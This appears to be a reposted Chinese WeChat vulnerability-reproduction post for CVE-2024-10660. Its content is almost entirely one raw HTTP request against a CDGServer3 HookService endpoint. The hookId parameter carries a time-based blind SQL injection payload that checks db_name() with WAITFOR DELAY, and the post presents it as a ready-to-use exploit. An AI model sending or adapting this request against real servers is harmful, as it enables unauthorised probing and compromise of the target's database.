GET /CDGServer3/parameter/HookService;logindojojs?command=DelHookService&hookId=1';if(db_name()='CobraDGServer')+WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 Host: Accept: */* Accept-Encoding: gzip, deflate, br Accept-Ldwk: bG91ZG9uZ3dlbmt1 Accept-Language: zh-Hans-CN;q=1 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
原文始发于微信公众号(漏洞文库):【漏洞复现】CVE-2024-10660
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论